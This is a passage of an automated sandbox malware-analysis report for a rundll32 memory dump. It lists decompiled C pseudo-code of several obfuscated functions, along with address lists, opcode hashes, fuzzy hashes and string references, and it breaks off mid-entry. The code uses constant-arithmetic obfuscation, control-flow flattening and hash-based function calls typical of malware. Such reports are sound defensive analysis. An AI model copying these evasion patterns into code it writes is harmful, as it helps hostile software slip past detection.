0x001b2a70
0x001b2a7e
0x001b2a83
0x001b2a89
0x001b2a91
0x001b2a9e
0x001b2aa2
0x001b2ab1
0x001b2ab5
0x001b2abd
0x001b2ac5
0x001b2aca
0x001b2ad2
0x001b2adf
0x001b2ae3
0x001b2aeb
0x001b2af0
0x001b2b0d
0x001b2b14
0x001b2b1c
0x001b2b1d
0x001b2b1e
0x001b2b31
0x001b2b33
0x001b2b38
0x001b2b44

Strings

%u, xrefs: 001B2A58

Memory Dump Source

Source File: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000007.00000002.2139927690.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: %u
API String ID: 0-2303018923
Opcode ID: 94f9e3df14bce23058a73d826947a6c6d60882057f16a01dec98b33c8bc0c123
Instruction ID: 886473736e17f76c844bb16cc8fbec4aa7e6996cf612e923a994b184f60252ec
Opcode Fuzzy Hash: 94f9e3df14bce23058a73d826947a6c6d60882057f16a01dec98b33c8bc0c123
Instruction Fuzzy Hash: 1D315871608340AFE384DF25D88A80BBBF2FFD5708F805A5CF98496260D7BAD9058F42

Uniqueness

Uniqueness Score: -1.00%

Function 001A5BAC, Relevance: 1.3, Strings: 1, Instructions: 74
COMMONCrypto

Download Yara Rule

C-Code - Quality: 58%

			E001A5BAC(void* __ecx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t57;
				intOrPtr* _t68;
				signed int _t71;
				signed int _t72;
				void* _t79;

				_t79 = __ecx;
				E001AD571(_t57);
				_v32 = 0x2d28e9;
				_v28 = 0x1aa92f;
				_v24 = 0;
				_v12 = 0xe90b;
				_t71 = 0xd;
				_v12 = _v12 / _t71;
				_t72 = 0x15;
				_v12 = _v12 * 0x29;
				_v12 = _v12 / _t72;
				_v12 = _v12 ^ 0x00005337;
				_v8 = 0xa1b3;
				_v8 = _v8 >> 4;
				_v8 = _v8 >> 3;
				_v8 = _v8 >> 0xf;
				_v8 = _v8 ^ 0x00000bbf;
				_v20 = 0x971d;
				_v20 = _v20 | 0x85bb821b;
				_v20 = _v20 ^ 0x85bbc9b2;
				_v16 = 0xe3b0;
				_v16 = _v16 ^ 0x6ea3c339;
				_v16 = _v16 + 0x10e3;
				_v16 = _v16 ^ 0x6ea33e58;
				_t68 = E001A546F(0x1d0, 0xbee648b, _t72, _t72, 0xb8db165d);
				return  *_t68(_a12, _a16, _t79, 0, 0, _a20, __ecx, 0, 0, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36);
			}

0x001a5bb9
0x001a5bd3
0x001a5bd8
0x001a5be1
0x001a5be8
0x001a5beb
0x001a5bf7
0x001a5bfc
0x001a5c05
0x001a5c09
0x001a5c16
0x001a5c1e
0x001a5c25
0x001a5c2c
0x001a5c30
0x001a5c34
0x001a5c38
0x001a5c3f
0x001a5c46
0x001a5c4d
0x001a5c54
0x001a5c5b
0x001a5c62
0x001a5c69
0x001a5c83
0x001a5c9e

Strings

(-, xrefs: 001A5BD8

Memory Dump Source

Source File: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000007.00000002.2139927690.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: (-
API String ID: 0-4239615555
Opcode ID: 3b80ea1216050408d7a966432e71dfe9f929747bfb6be23b8fd6f931166a0126
Instruction ID: 7d0eae98dca29e97f926adf98feef5c2d17da682753e987e82f81882e2ab0c37
Opcode Fuzzy Hash: 3b80ea1216050408d7a966432e71dfe9f929747bfb6be23b8fd6f931166a0126
Instruction Fuzzy Hash: 30311172900208EFDF05DF95C80A8DEBFB5EB99304F10808AE514A6250D3B59A659FA0

Uniqueness

Uniqueness Score: -1.00%

Function 001ACF5B, Relevance: 1.3, Strings: 1, Instructions: 71
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E001ACF5B(void* __ecx) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* _t52;
				signed int _t55;
				signed int _t56;
				void* _t58;
				intOrPtr _t66;
				void* _t67;
				signed int* _t69;

				_t58 = __ecx;
				_t69 =  &_v28;
				_v12 = 0x287631;
				_t66 = 0;
				_v8 = 0;
				_t67 = 0x156eb747;
				_v4 = 0;
				_v20 = 0xcbe6;
				_v20 = _v20 + 0xffffd67b;
				_t55 = 0x49;
				_v20 = _v20 / _t55;
				_v20 = _v20 ^ 0x00007983;
				_v28 = 0xea19;
				_v28 = _v28 >> 5;
				_v28 = _v28 >> 3;
				_t56 = 0x66;
				_v28 = _v28 / _t56;
				_v28 = _v28 ^ 0x000007fe;
				_v16 = 0x167e;
				_v16 = _v16 >> 0xd;
				_v16 = _v16 ^ 0x0000110e;
				_v24 = 0xfdc1;
				_v24 = _v24 ^ 0xf0acdba6;
				_v24 = _v24 + 0x4c0;
				_v24 = _v24 ^ 0xcbee03a8;
				_v24 = _v24 ^ 0x3b426675;
				do {
					while(_t67 != 0x736bc83) {
						if(_t67 == 0x156eb747) {
							_t67 = 0x736bc83;
							continue;
						} else {
							if(_t67 != 0x2a81ed09) {
								goto L8;
							} else {
								_t66 = _t66 + E001B9B74(_t58 + 4, _v16, _v24);
							}
						}
						L5:
						return _t66;
					}
					_push(_t58);
					_t52 = E001A56BA();
					_t69 =  &(_t69[1]);
					_t67 = 0x2a81ed09;
					_t66 = _t66 + _t52;
					L8:
				} while (_t67 != 0x34dad2c1);
				goto L5;
			}

0x001acf5b
0x001acf5b
0x001acf5f
0x001acf6c
0x001acf73
0x001acf77
0x001acf79
0x001acf7d
0x001acf85
0x001acf93
0x001acf98
0x001acf9c
0x001acfa4
0x001acfac
0x001acfb1
0x001acfbc
0x001acfc9
0x001acfcd
0x001acfd5
0x001acfdd
0x001acfe2
0x001acfea
0x001acff2
0x001acffa
0x001ad002
0x001ad00a
0x001ad012
0x001ad012
0x001ad018
0x001ad03d
0x00000000
0x001ad01a
0x001ad01c
0x00000000
0x001ad01e
0x001ad031
0x001ad031
0x001ad01c
0x001ad033
0x001ad03c
0x001ad03c
0x001ad049
0x001ad04a
0x001ad04f
0x001ad052
0x001ad054
0x001ad056
0x001ad056
0x00000000

Strings

ufB;, xrefs: 001AD00A

Memory Dump Source

Source File: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000007.00000002.2139927690.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ufB;
API String ID: 0-1119616131
Opcode ID: 2373a7a986811a1f8a6391b5bdcf9823f87368fb37048cd9cb78713203ab0d24
Instruction ID: 2ea0b5734291dfa0417b8a8e3e0c57938329e8a19fc98f76bae5a5d80cfab974
Opcode Fuzzy Hash: 2373a7a986811a1f8a6391b5bdcf9823f87368fb37048cd9cb78713203ab0d24
Instruction Fuzzy Hash: 0621CAB29093028BD324DE29E48550BFAE2FBE4708F16491DF59593211D3B5CA0D8BE3

Uniqueness

Uniqueness Score: -1.00%

Function 001AD2C9, Relevance: 1.3, Strings: 1, Instructions: 51
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E001AD2C9(void* __edx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _t67;
				signed int _t68;

				_v20 = 0x3eba;
				_v20 = _v20 << 0xb;
				_v20 = _v20 >> 2;
				_v20 = _v20 << 8;
				_v20 = _v20 ^ 0x7d7400b7;
				_v16 = 0x5189;
				_v16 = _v16 + 0xf858;
				_t67 = 0x2d;
				_v16 = _v16 / _t67;
				_v16 = _v16 ^ 0x165c1a53;
				_v16 = _v16 ^ 0x165c41f1;
				_v12 = 0xd806;
				_t68 = 0x72;
				_v12 = _v12 / _t68;
				_v12 = _v12 ^ 0xba49b1de;
				_v12 = _v12 << 6;
				_v12 = _v12 ^ 0x926c7d2d;
				_v8 = 0x2dd8;
				_v8 = _v8 ^ 0x1db834f3;
				_v8 = _v8 ^ 0x117acc45;
				_v8 = _v8 + 0x4c59;
				_v8 = _v8 ^ 0x0cc35c55;
				_push(__edx);
				return E001A546F(_a4, 0xebe0dc83, __edx, __edx, __edx);
			}

0x001ad2cf
0x001ad2d8
0x001ad2de
0x001ad2e2
0x001ad2e6
0x001ad2ed
0x001ad2f4
0x001ad301
0x001ad306
0x001ad30b
0x001ad312
0x001ad319
0x001ad323
0x001ad329
0x001ad32c
0x001ad333
0x001ad337
0x001ad33e
0x001ad345
0x001ad34c
0x001ad353
0x001ad35a
0x001ad36d
0x001ad382

Strings

YL, xrefs: 001AD353

Memory Dump Source

Source File: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000007.00000002.2139927690.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: YL
API String ID: 0-1439365465
Opcode ID: df318cfbd63c9f95b886304f8732b1291cbb3e97ffa1d0a91dde9567e1409c19
Instruction ID: cabb62b5bf162a9770ffd9961d26239df4339b5058a2cdf9d3e66096ac0a87ce
Opcode Fuzzy Hash: df318cfbd63c9f95b886304f8732b1291cbb3e97ffa1d0a91dde9567e1409c19
Instruction Fuzzy Hash: AA112671D00218EBDB48DFE9C94A8EEBBB5FB04354F14C189E826A7250D7B42B54CF80

Uniqueness

Uniqueness Score: -1.00%

Function 1000CF69, Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2144561604.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2144552179.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144633674.000000001001D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144648856.0000000010026000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2144655977.000000001002A000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction ID: 2796bdea7be9d7cbe2ca56c58503eca1866cd8cfa8a0d68fedd2743cac7be283
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: 10C16F322092930AFB5DC639947553EBEE19F926F1717176EE8B2CB1C8EF20C524D620

Uniqueness

Uniqueness Score: -1.00%

Function 1000D39E, Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2144561604.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2144552179.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144633674.000000001001D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144648856.0000000010026000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2144655977.000000001002A000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: 3db4422262a7eedf43580bfc378bfc97ee2125ad463b6dab06b404128ed41114
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: 00C17F322091930AFB5DC739943543EBEE19B926F131B176EE8B6CB1C9EF20D524D620

Uniqueness

Uniqueness Score: -1.00%

Function 1000CB34, Relevance: .3, Instructions: 331COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2144561604.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2144552179.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144633674.000000001001D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144648856.0000000010026000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2144655977.000000001002A000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction ID: 5667c4c34dfd57f849829d1ad735bd2acc474041e1a0072994f030a9c60001b1
Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction Fuzzy Hash: 94C14C322052970AFB4D873AD47583EBEE19B926F1717176ED8B2CB1D8EF20D524D620

Uniqueness

Uniqueness Score: -1.00%

Function 1000C71C, Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2144561604.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2144552179.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144633674.000000001001D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144648856.0000000010026000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2144655977.000000001002A000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: c9637272eabe2a301ea8f6155d1e3ac1f6e39a7e0aef0e314501c9d969a0eeed
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: 5EC16F322092970AFB4DC739947583EBEE19B926F1717576DE4B2CB1D8EF20C524D620

Uniqueness

Uniqueness Score: -1.00%

Function 001B473C, Relevance: .2, Instructions: 195
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E001B473C(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				short _v104;
				char* _v108;
				char* _v112;
				signed int _v116;
				char _v120;
				char _v640;
				char _v1160;
				void* _t215;
				signed int _t249;
				signed int _t253;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				signed int _t258;
				signed int _t286;
				void* _t288;

				_push(_a12);
				_t288 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001AD571(_t215);
				_v56 = 0x4114;
				_v56 = _v56 | 0xd79a36e6;
				_v56 = _v56 << 0xd;
				_v56 = _v56 ^ 0x4efec001;
				_v64 = 0xe772;
				_t253 = 0x5d;
				_t286 = 0x1e;
				_v64 = _v64 * 0x37;
				_v64 = _v64 | 0x782e01af;
				_v64 = _v64 ^ 0x783fbfeb;
				_v24 = 0x1663;
				_v24 = _v24 + 0xffff4539;
				_v24 = _v24 | 0x3b21799f;
				_v24 = _v24 + 0xffff660d;
				_v24 = _v24 ^ 0xfffee9ac;
				_v84 = 0x1aa0;
				_v84 = _v84 + 0x58c;
				_v84 = _v84 ^ 0x0000229a;
				_v68 = 0x1abd;
				_v68 = _v68 + 0xffff4a9c;
				_v68 = _v68 ^ 0xffff75a0;
				_v12 = 0x1160;
				_v12 = _v12 + 0x1485;
				_v12 = _v12 | 0x93f7c04c;
				_v12 = _v12 / _t253;
				_v12 = _v12 ^ 0x01973c3e;
				_v40 = 0x5b40;
				_v40 = _v40 | 0x500fbdd2;
				_v40 = _v40 << 2;
				_v40 = _v40 ^ 0x403fa886;
				_v28 = 0x9d09;
				_v28 = _v28 + 0x469b;
				_v28 = _v28 / _t286;
				_t254 = 0x76;
				_v28 = _v28 / _t254;
				_v28 = _v28 ^ 0x000007b0;
				_v80 = 0xaed2;
				_t255 = 0x3c;
				_v80 = _v80 / _t255;
				_v80 = _v80 ^ 0x00003a2b;
				_v60 = 0x4b88;
				_v60 = _v60 << 0xd;
				_v60 = _v60 + 0x2f84;
				_v60 = _v60 ^ 0x097109d3;
				_v44 = 0xf066;
				_v44 = _v44 << 1;
				_v44 = _v44 | 0x79c2caa0;
				_v44 = _v44 ^ 0x79c3ebd7;
				_v88 = 0x2259;
				_v88 = _v88 >> 5;
				_v88 = _v88 ^ 0x00005b17;
				_v48 = 0x7ba5;
				_v48 = _v48 ^ 0xc5fa1dbc;
				_v48 = _v48 + 0xb2f6;
				_v48 = _v48 ^ 0xc5fb5f44;
				_v36 = 0x1361;
				_t256 = 0x7a;
				_v36 = _v36 / _t256;
				_v36 = _v36 + 0xffff0da4;
				_v36 = _v36 ^ 0xffff698e;
				_v52 = 0x5b77;
				_v52 = _v52 + 0xfffffc2c;
				_t257 = 0xf;
				_v52 = _v52 * 0x11;
				_v52 = _v52 ^ 0x0005c2cd;
				_v8 = 0x4bf1;
				_v8 = _v8 ^ 0x1795dc61;
				_v8 = _v8 | 0x7024afad;
				_v8 = _v8 << 0xc;
				_v8 = _v8 ^ 0x5bfbd5d8;
				_v20 = 0x719e;
				_v20 = _v20 * 0x29;
				_v20 = _v20 >> 9;
				_v20 = _v20 ^ 0x0efce61c;
				_v20 = _v20 ^ 0x0efcce1e;
				_v16 = 0xe06f;
				_v16 = _v16 ^ 0xda05f8ae;
				_t258 = 0x4e;
				_v16 = _v16 / _t257;
				_v16 = _v16 / _t258;
				_v16 = _v16 ^ 0x002fa3ed;
				_v72 = 0xf23d;
				_v72 = _v72 | 0x6e9f03b3;
				_v72 = _v72 ^ 0x6e9ff6ff;
				_v32 = 0x326;
				_v32 = _v32 >> 6;
				_v32 = _v32 ^ 0x59ad8c35;
				_v32 = _v32 + 0xa07d;
				_v32 = _v32 ^ 0x59ae2262;
				_v76 = 0xb356;
				_v76 = _v76 + 0xfded;
				_v76 = _v76 ^ 0x00018886;
				E001A554B(_t286, _v84, _v68,  &_v120, _v12, _v40);
				E001A554B(0x208, _v28, _v80,  &_v640, _v60, _v44);
				E001A554B(0x208, _v88, _v48,  &_v1160, _v36, _v52);
				E001AD456(_t288, _v8,  &_v640, _v20);
				E001AD456(_a12, _v16,  &_v1160, _v72);
				_v116 = _v56;
				_v112 =  &_v640;
				_v108 =  &_v1160;
				_v104 = _v24 | _v64;
				_t249 = E001A2696( &_v120, _v32, _v76);
				asm("sbb eax, eax");
				return  ~_t249 + 1;
			}

0x001b4747
0x001b474a
0x001b474c
0x001b474f
0x001b4752
0x001b4753
0x001b4754
0x001b4759
0x001b4762
0x001b4769
0x001b476d
0x001b4774
0x001b4781
0x001b4784
0x001b4785
0x001b4788
0x001b478f
0x001b4796
0x001b479d
0x001b47a4
0x001b47ab
0x001b47b2
0x001b47b9
0x001b47c0
0x001b47c7
0x001b47ce
0x001b47d5
0x001b47dc
0x001b47e3
0x001b47ea
0x001b47f1
0x001b47ff
0x001b4802
0x001b4809
0x001b4810
0x001b4817
0x001b481b
0x001b4822
0x001b4829
0x001b4837
0x001b483f
0x001b4844
0x001b4849
0x001b4850
0x001b485a
0x001b485d
0x001b4860
0x001b4867
0x001b486e
0x001b4872
0x001b4879
0x001b4880
0x001b4887
0x001b488a
0x001b4891
0x001b4898
0x001b489f
0x001b48a3
0x001b48aa
0x001b48b1
0x001b48b8
0x001b48bf
0x001b48c6
0x001b48d4
0x001b48d9
0x001b48de
0x001b48e5
0x001b48ec
0x001b48f3
0x001b48fe
0x001b4901
0x001b4904
0x001b490b
0x001b4912
0x001b4919
0x001b4920
0x001b4924
0x001b492b
0x001b4936
0x001b4939
0x001b493d
0x001b4944
0x001b494b
0x001b4952
0x001b495e
0x001b495f
0x001b496b
0x001b4971
0x001b4978
0x001b497f
0x001b4986
0x001b498d
0x001b4994
0x001b4998
0x001b499f
0x001b49a6
0x001b49ad
0x001b49b4
0x001b49bb
0x001b49cf
0x001b49ee
0x001b4a08
0x001b4a1f
0x001b4a34
0x001b4a3f
0x001b4a48
0x001b4a51
0x001b4a60
0x001b4a64
0x001b4a6e
0x001b4a76

Memory Dump Source

Source File: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000007.00000002.2139927690.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 997b8f7b0b5114a3492ad23f5f96e9d9abc6d51eba7f3338696131cb677751df
Instruction ID: e73d886f4de3b419ce1e87aa9e99764b2bcfd3bbc328f2e046e614676b5fd6b6
Opcode Fuzzy Hash: 997b8f7b0b5114a3492ad23f5f96e9d9abc6d51eba7f3338696131cb677751df
Instruction Fuzzy Hash: C2A10EB1D0020DEBDF18CFA5D98A8DEBBB2FF44304F208159E516B62A0D7B85A06CF54

Uniqueness

Uniqueness Score: -1.00%

Function 001B4460, Relevance: .2, Instructions: 171
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E001B4460(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a20, intOrPtr _a24) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				signed int _v64;
				signed int _v68;
				void* _t159;
				signed int _t176;
				void* _t177;
				void* _t179;
				signed int _t187;
				void* _t189;
				void* _t190;
				void* _t191;

				_push(_a24);
				_t177 = __edx;
				_push(_a20);
				_push(0xffffffff);
				_push(0);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001AD571(_t159);
				_v12 = 0xcbc7;
				_t191 = _t190 + 0x20;
				_v12 = _v12 | 0x6207a749;
				_v12 = _v12 << 0xb;
				_t189 = 0;
				_v12 = _v12 >> 5;
				_t179 = 0x2a79b9cd;
				_v12 = _v12 ^ 0x01fbdccb;
				_v68 = 0x38d7;
				_v68 = _v68 << 4;
				_v68 = _v68 ^ 0x00038494;
				_v56 = 0x468f;
				_v56 = _v56 + 0xffffeab5;
				_v56 = _v56 >> 0xa;
				_v56 = _v56 ^ 0x00005e29;
				_v52 = 0x7361;
				_v52 = _v52 + 0xffff3106;
				_v52 = _v52 + 0xeadf;
				_v52 = _v52 ^ 0x0000dffa;
				_v8 = 0x1f6;
				_v8 = _v8 | 0xbf4d4175;
				_v8 = _v8 + 0x5a52;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x005fdc16;
				_v48 = 0x477;
				_t187 = 0x31;
				_v48 = _v48 * 0x57;
				_v48 = _v48 * 0x69;
				_v48 = _v48 ^ 0x009f4c60;
				_v60 = 0x58a8;
				_v60 = _v60 * 0x13;
				_v60 = _v60 >> 0xd;
				_v60 = _v60 ^ 0x00006559;
				_v24 = 0xb7fe;
				_v24 = _v24 + 0xffff2507;
				_v24 = _v24 >> 0xd;
				_v24 = _v24 | 0x139e816d;
				_v24 = _v24 ^ 0x139fe4a1;
				_v20 = 0xcfb1;
				_v20 = _v20 + 0xffff4f07;
				_v20 = _v20 + 0x9662;
				_v20 = _v20 | 0x79bb0dcf;
				_v20 = _v20 ^ 0x79bbc857;
				_v16 = 0x974b;
				_v16 = _v16 + 0xb9c6;
				_v16 = _v16 << 0xa;
				_v16 = _v16 | 0x4b0cac47;
				_v16 = _v16 ^ 0x4f4ce9da;
				_v44 = 0x2a52;
				_v44 = _v44 + 0x1edc;
				_v44 = _v44 / _t187;
				_v44 = _v44 >> 0xf;
				_v44 = _v44 ^ 0x0000753f;
				_v40 = 0xdfd8;
				_v40 = _v40 + 0xc03c;
				_v40 = _v40 ^ 0x6b56b66b;
				_v40 = _v40 ^ 0x7b75b46a;
				_v40 = _v40 ^ 0x1022d6d2;
				_v64 = 0xfa66;
				_v64 = _v64 + 0xb224;
				_v64 = _v64 + 0xffff4617;
				_v64 = _v64 ^ 0x0000d9f4;
				_v36 = 0xc2fb;
				_v36 = _v36 + 0xffff7083;
				_v36 = _v36 | 0x5eb877a2;
				_t188 = _v68;
				_v36 = _v36 * 0x5e;
				_v36 = _v36 ^ 0xc7bc5609;
				_v32 = 0x57cb;
				_v32 = _v32 * 0x79;
				_v32 = _v32 << 0xf;
				_v32 = _v32 + 0x88d4;
				_v32 = _v32 ^ 0xbf7a0527;
				_v28 = 0x84af;
				_v28 = _v28 + 0xd846;
				_v28 = _v28 | 0x44899c19;
				_v28 = _v28 << 1;
				_v28 = _v28 ^ 0x8913c1c6;
				while(_t179 != 0xa549ca5) {
					if(_t179 == 0x2795ab78) {
						_push(_t179);
						_push(_t179);
						_t189 = E001B922B(_t188 + _t188);
						_t191 = _t191 + 0xc;
						if(_t189 != 0) {
							_t179 = 0xa549ca5;
							continue;
						}
					} else {
						if(_t179 == 0x2a79b9cd) {
							_t179 = 0x337bab1b;
							continue;
						} else {
							if(_t179 != 0x337bab1b) {
								L11:
								if(_t179 != 0x10206f3e) {
									continue;
								}
							} else {
								_t176 = E001A80D6(_v12, _t177, _v68, 0, _a8, 0, _v56, _t179, _v52, _v8, 0xffffffff, _v48);
								_t188 = _t176;
								_t191 = _t191 + 0x28;
								if(_t176 != 0) {
									_t179 = 0x2795ab78;
									continue;
								}
							}
						}
					}
					return _t189;
				}
				E001A80D6(_v44, _t177, _v40, _t188, _a8, _t189, _v64, _t179, _v36, _v32, 0xffffffff, _v28);
				_t191 = _t191 + 0x28;
				_t179 = 0x10206f3e;
				goto L11;
			}

0x001b4469
0x001b446c
0x001b446e
0x001b4471
0x001b4473
0x001b4475
0x001b4478
0x001b447b
0x001b447c
0x001b447d
0x001b4482
0x001b4489
0x001b448c
0x001b4495
0x001b4499
0x001b449b
0x001b449f
0x001b44a4
0x001b44ab
0x001b44b2
0x001b44b6
0x001b44bd
0x001b44c4
0x001b44cb
0x001b44cf
0x001b44d6
0x001b44dd
0x001b44e4
0x001b44eb
0x001b44f2
0x001b44f9
0x001b4500
0x001b4507
0x001b450b
0x001b4512
0x001b451f
0x001b4520
0x001b4527
0x001b452a
0x001b4531
0x001b453c
0x001b453f
0x001b4543
0x001b454a
0x001b4551
0x001b4558
0x001b455c
0x001b4563
0x001b456a
0x001b4571
0x001b4578
0x001b457f
0x001b4586
0x001b458d
0x001b4594
0x001b459b
0x001b459f
0x001b45a6
0x001b45ad
0x001b45b4
0x001b45c0
0x001b45c3
0x001b45c7
0x001b45ce
0x001b45d5
0x001b45dc
0x001b45e3
0x001b45ea
0x001b45f1
0x001b45f8
0x001b45ff
0x001b4606
0x001b460d
0x001b4614
0x001b461b
0x001b4626
0x001b4629
0x001b462c
0x001b4633
0x001b463e
0x001b4641
0x001b4645
0x001b464c
0x001b4653
0x001b465a
0x001b4661
0x001b4668
0x001b466b
0x001b4672
0x001b4684
0x001b46e0
0x001b46e1
0x001b46eb
0x001b46ed
0x001b46f2
0x001b46f4
0x00000000
0x001b46f4
0x001b4686
0x001b468c
0x001b46cd
0x00000000
0x001b468e
0x001b4694
0x001b4727
0x001b472d
0x00000000
0x00000000
0x001b469a
0x001b46b8
0x001b46bd
0x001b46bf
0x001b46c4
0x001b46c6
0x00000000
0x001b46c6
0x001b46c4
0x001b4694
0x001b468c
0x001b473b
0x001b473b
0x001b471a
0x001b471f
0x001b4722
0x00000000

Memory Dump Source

Source File: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000007.00000002.2139927690.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7e930bfaf3c0dcf0cda936776f139e0e30909ca7513da27356b2a3cec3367b5
Instruction ID: acd3847f29e3dbf20a8180332e4620d961939e20764ca944d30747961713cb2e
Opcode Fuzzy Hash: c7e930bfaf3c0dcf0cda936776f139e0e30909ca7513da27356b2a3cec3367b5
